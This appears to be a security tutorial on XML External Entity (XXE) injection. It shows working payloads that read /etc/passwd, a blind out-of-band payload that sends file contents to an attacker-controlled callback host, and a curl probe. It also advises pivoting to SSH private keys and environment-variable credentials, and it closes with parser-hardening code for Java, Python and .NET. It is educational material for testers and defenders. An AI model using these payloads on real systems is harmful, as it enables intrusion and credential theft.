In 2021, a misconfigured XML parser in a healthcare portal exposed patient records to unauthenticated attackers via a classic XXE injection flaw — no authentication bypass needed, just a crafted XML payload. XXE (XML External Entity) injection abuses how XML parsers resolve external entity references, letting attackers read local files, trigger SSRF, or even execute blind out-of-band data exfiltration. If your application accepts XML anywhere — SOAP APIs, file uploads, document parsers — this attack surface is worth your full attention.
How XXE Works: Reading Local Files
XML supports a feature called external entities — references that tell the parser to fetch content from a URI or local path. Parsers with this feature enabled will dutifully resolve those references, even when the XML comes from an untrusted user.
Here’s the classic payload. Suppose the app at https://portal.internalcorp.local/api/upload accepts an XML document for invoice processing:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE invoice [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<invoice>
<vendor>&xxe;</vendor>
<amount>5000</amount>
</invoice>
When the parser hits &xxe;, it resolves the entity — reading /etc/passwd — and injects the file contents into the response. If the server is running as a low-privilege user, you get user account names. If it’s running as root, you may get password hashes. The response might look like this:
HTTP/1.1 200 OK
Content-Type: application/json
{
"status": "received",
"vendor": "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\njdoe:x:1001:1001:John Doe,,,:/home/jdoe:/bin/bash"
}
You’ve confirmed XXE is exploitable. User jdoe is a local account — a natural pivot target. Next step: escalate to reading SSH private keys at file:///home/jdoe/.ssh/id_rsa, or start probing internal services using http:// URIs for SSRF.
Blind XXE: Exfiltrating Data Out-of-Band
Most real-world XXE bugs are blind — the server processes your XML but doesn’t echo the entity value back in the response. You need an out-of-band channel. The standard technique is to make the parser send a DNS or HTTP request to a server you control.
Set up a listener first. interactsh is a purpose-built tool for catching out-of-band callbacks — think Burp Collaborator but open source.
# Start an interactsh client to get a unique callback URL
$ interactsh-client
[INF] Listing on unique.r4nd0m.interact.sh
[INF] Waiting for interactions...
Now craft a two-stage XXE payload. The first entity loads your target file; the second entity sends it to your server via an HTTP request with the data URL-encoded in the path:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % secret SYSTEM "file:///etc/hostname">
<!ENTITY % oob SYSTEM "http://unique.r4nd0m.interact.sh/?data=%secret;">
%oob;
]>
<foo>trigger</foo>
Submit this to POST /api/process on your target at 192.0.2.47. Watch your interactsh terminal:
[INF] Received interaction from 192.0.2.47
GET /?data=prod-invoiceserver-01 HTTP/1.1
Host: unique.r4nd0m.interact.sh
User-Agent: Java/11.0.15
Two things just happened. The hostname prod-invoiceserver-01 leaked — useful for internal network mapping. And the User-Agent revealed the server is running Java 11, which narrows your exploit library considerably. From here, escalate by swapping /etc/hostname for /proc/self/environ to grab environment variables, which often contain AWS keys, database credentials, or API tokens in cloud deployments.
Finding XXE in the Wild: Automated Discovery
Manual crafting works, but at scale you need tooling. dalfox handles XSS; for XXE, xmlsec and Burp’s active scanner are common. For quick CLI-based probing, many testers use curl plus a local HTTP server to confirm callback.
# Inject and listen simultaneously
$ python3 -m http.server 8080 &
$ curl -s -X POST https://192.0.2.47/api/upload \
-H "Content-Type: application/xml" \
-d '<?xml version="1.0"?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://192.0.2.1:8080/xxe-probe">]><x>&xxe;</x>'
# Your http.server output:
192.0.2.47 - - [28/Jun/2026 09:14:32] "GET /xxe-probe HTTP/1.1" 200 -
That inbound GET request from 192.0.2.47 is your proof of concept. The parser resolved the external entity and reached out to your machine — XXE confirmed in under 30 seconds. Document the request and response pair verbatim; that’s your reproduction evidence for the report.
Defending Against XXE
The fix is disabling external entity processing at the parser level — not input validation, not a WAF rule. In Java’s JAXP:
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
All three lines matter. Disabling just one still leaves attack surface. For Python’s lxml, pass resolve_entities=False and no_network=True to the parser. For .NET, set XmlResolver = null on your XmlReaderSettings.
What To Do Now: Grep your codebase right now for XML parser initialization — search for DocumentBuilderFactory, XMLReader, lxml.etree, or XmlDocument. For every hit, verify that external entity resolution is explicitly disabled. One unguarded parser instance is all it takes.
